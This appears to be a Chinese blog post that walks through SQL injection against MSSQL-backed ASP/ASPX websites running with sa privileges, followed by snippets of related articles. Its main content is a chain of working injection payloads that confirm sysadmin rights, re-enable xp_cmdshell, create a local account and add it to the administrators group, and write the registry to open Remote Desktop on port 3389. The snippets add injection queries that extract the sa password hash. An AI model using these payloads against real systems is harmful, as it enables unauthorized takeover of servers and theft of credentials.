mssql数据库注入-sa权限

最新推荐文章于 2024-08-15 09:18:00 发布
原创 最新推荐文章于 2024-08-15 09:18:00 发布 · 633 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#数据库 #sqlserver #服务器
文章详细阐述了如何通过SQL注入检测和利用MSSQL数据库的SA权限,包括检查数据库存在、验证用户权限、启用扩展存储过程以及利用这些过程来添加用户、修改系统设置和开启远程桌面连接,从而对服务器进行潜在的非法操作。

准备一个网站,mssql是微软数据库,网站后缀是asp或者aspx,权限涉及sa,dbowner,public。

sa权限注入

找到注入点后,检查是否是mssal数据库用 

and exists (select * from%20sysobjects)

sysobjects是自带数据库,和mysql的information_schema性质类同,如果数据库的名字错误,界面会报错

 判断用户名and system_user=0

 检查是不是sa权限

and 1=(select IS_SRVROLEMEMBER('sysadmin'))

没报错,说明是sa权限,可以利用拓展,将权限可以换成db_owner或者public就是判断权限归属

检查扩展存储是否存在

and 1=(select count(*) from master.dbo.sysobjects where name ='xp_cmdshell') 

如果没有拓展程序可以进行恢复

;EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;--

 

用拓展程序添加账户

;exec master..xp_cmdshell 'net user test test /add'

master库里面执行拓展程序,创建一个test账户密码test

test账户添加到本地管理员组

;exec master..xp_cmdshell 'net localgroup administrators test /add' 

可以看到创建时间

 开启3389端口进行远程连接宿主机

;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;

xp_regwrite是另一个远程拓展程序,上面是用注册表远程桌面控制,开启3389,REG_DWORD如果是0就是开启,是1就是关闭。

开启端口就可以连接宿主机

用刚才创建的那个test账户就能登录到宿主机

 

 

 

三种方式获取SSMS连接密码
热门推荐
weixin_44302503的博客
01-04 1万+
内网渗透是有的时候会遇到对方SSMS没断开连接正连着别的机器的mssql此时有两种方法可以获取sa密码 当密码强度较弱时可以使用第一只方式,第一种方式解不开的情况下可以使用后面二种方式 1.直接sa密码hash 使用如下语句: Select master.dbo.fn_varbintohexstr(password_hash) from sys.sql_logins where name = 'sa' 直接得到sa密码hash 上cmd5解密 2.使用SS...
SQL注入获取Sa账号密码
05-12 2129
漏洞位置:http://168.1.1.81/Information/Search?Keyword=1111 漏洞利用: MSSQL 2000 http://168.1.1.81/Information/Search ?Keyword=1111%' AND (Select master.dbo.fn_varbintohexstr(password) from mast...
MSSSQL 数据库级触发器保存每次修改记录
ruo40018293的博客
06-27 453
创建记录表GOGO[ID] ASCGOGO数据库级触发器GOGOGORENAMEASBEGINELSEBEGINENDBEGINEND。
网络安全之了解安全托管服务(MSS)
wangluo12138的博客
08-10 2747
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
mssql提权总结
st3pby的博客
12-30 3236
mssql提权总结
sqlserver注入
qq_49714982的博客
02-20 1954
cmd登录mssql:osql -S 127.0.0.1 -U sa -P 134679258qaZ@使用数据库:use test询语句:select * from users询所有数据库:select name from sysdatabases看当前数据库所有的表:select name from sysobjects。
网络安全进阶学习第十四课——MSSQL注入
p36273的博客
08-07 2505
and 1=convert(int,(select quotename(name) from 数据库名.dbo.sysobjects where xtype=‘U’ FOR XML PATH(‘’))) –主要字段有:name(表名)、id(表 ID)、xtype(创建的对象)。and 1=(select top 1 * from 指定数据库.dbo.指定表名 where排除条件 FOR XML PATH(‘’))–举例:replace(‘1-a 2-b’,’-’, ’:’),返回结果是:1:a 2:b。
sql server注入执行命令
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-12 1704
1. mssql权限 sa权限数据库操作,文件管理,命令执行,注册表读取等system。是mssql的最高权限 db权限:文件管理,数据库操作等 users-administrators public权限数据库操作 guest-users 2、sql server注入执行命令 数据库版本,数据库名字,用户名,操作系统 select * from member where id=-1 union select version(),database(),user(),@@version_compile_
MsSqlServer管理员sa设置简单密码,安装完成后再启用sa
kfepiza的博客
06-11 1380
SqlServer可以使用Windows系统用户登录, 或系统用户+数据库用户。如果想给"sa"设置简单密码, 就不能在安装过程中设置, 要安装完成后再设。在安装过程中可选择只允许系统用户登录或者两种都允许。取消密码策略,并设置简单密码。先选择只允许系统用户登录。
mysql数据库sa默认密码_SQL Server数据库sa密码相关问题的解决方法
weixin_39883256的博客
02-02 8369
1、如何sqlserversa密码?询分析器,连接时,身份验证使用"使用windows身份验证"然后,执行:EXEC sp_password NULL, 'NewPassword', 'Sa'企业管理器-->实例名-->安全性-->登录-->双击右边的SA-->更改密码问:丢失SA密码如何找回?答:用户操作失误造成密码丢失。有两种方法:如果数据不多,可重装TN...
MSSQL SA弱口令***那些事
weixin_34293902的博客
07-04 634
本文技术交流与学习之用,请勿非法使用,产生任何后果本人概不负责。一、如何找到SA弱口令计算机1、扫描获得1433端口开放的计算机 端口扫描器和专门的SQL扫描器很多,笔者经过大量的测试,推荐使用ssport(如图1)这款扫描器进行扫描,尽管有些基于SYN方式的扫描器扫描速度很快,但误报和漏扫情况比较多,而且对网络速度要求比较高,而ssport可以根据扫描计算机的硬件...
MS-SQLSERVER四大系統數據庫
windfancy_tang的专栏
12-24 505
2。MODEL:      MODEL數據庫的作用在於:在系統上創建所有數據庫的模板。    當發出    Createdatabase語句時,新的數據庫第一時間將通過複製到MODEL數據中創建,其餘部分將由空頁填充,如此可以想到,由於每次重啟SQL SERVER 都會重新創建TEMPDB,所以MODEL數據庫一定在SQLSEVER中.3。MSDB:      MSDB提供SQLSEV
MSSQL数据库注入
zhuangsle的博客
08-26 1578
MSSQL数据库注入实践 一、MSSQL注入的基础知识 (一)注入点的检测 1、数据库类型判断 概述 MSSQL数据库中,存在一个系统表sysobjects,可以通过判断这个表是否存在来判断该数据库是否MSSQL数据库 SQL语句执行 select * from admin where id=1 and exists(select * from sysobjects); # 正常返回结果,则表示存在该数据库表 select * from admin where id=1 and exists(se
MSSQLsa密码输入过多被锁定
最新发布
where happens的博客
08-15 211
MSSQLsa密码输入过多被锁定 ALTER LOGIN sa WITH PASSWORD = '原来密码' UNLOCK;
SQL Server中,搭建本地数据库服务,使用sa账户登录失败解决方法
u012138032的博客
12-23 9691
首先选择【Windows身份验证】模式连接数据库引擎。 在建立的连接上右键单击,选择【属性】,进入【服务器属性】界面。在左侧选择页中点击【安全性】,然后在右侧安全性设置界面的【服务器身份验证】一栏中选择【SQL Server和Windows身份验证模式】,点击【确定】按钮。 完成上述步骤之后,再次连接还是不能成功。这是因为初次使用登录名s
mysql错误18456_SQL Server 2012 sa用户登录错误18456的解决方法
weixin_30467625的博客
01-28 365
最近想研究下SQL SERVER2012 Enterprise版本的数据库,听说功能很强大。我是在win7上安装的,安装的过程很顺利,我在用“Windows 身份验证”时,一切OK,但是在用SA用户登录数据库的时候出现如下的错误:之前装过SQL7.0, SQL2000, SQL2005版的、2008版的,好像没有这复杂啊,百度了下找到了一个解决方案,归纳一下:这个错误一般由三个原因引起,登录方式设...
MSSQL数据库系统概述
sinat_25911307的博客
02-25 723
数据库的四个基本概念 数据:数据是数据库中存储的基本对象 数据库:长期存储在计算机内,有组织的,可共享的大量数据集合。数据库中数据一定按照数据模型组织、描述和存储,具有较小的冗余度、较高的数据独立性和易扩展性,并可为各种用户共享。 数据库管理系统:科学的组织和存储数据,高效的获取和维护数据。具体功能如下: (1)数据定义功能。 (2)数据组织存储和管理。 (3)数据操纵。 (4)数据库的事务管理...
【网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限SQL注入SQL注入点利用以及getshell_sqlsever数据库报错注入(1)
2401_84970415的博客
05-13 1006
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
启用sa账号访问数据库
lengyuefeng212的博客
10-25 2096
安装好数据库之后怎么启用sa账号,来访问数据库。 1.先用windows账号登录数据库。 2.启用windows身份验证方式和sql server身份验证方式。 步骤: 右键属性 点击安全性 点击确定 确定 重启sql server 右键关闭再启动 再打开可视化软件 右键属性 点击状态,点击启用 修改sa密码 点击常规里面修改密码(密码123456) 点击刷新 断开连接 输入sa输入密码 登录成功 昨天终于把学长的项目完结了,写了c#上位机和连接数据库。今天可以做自己的事情了,定个
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值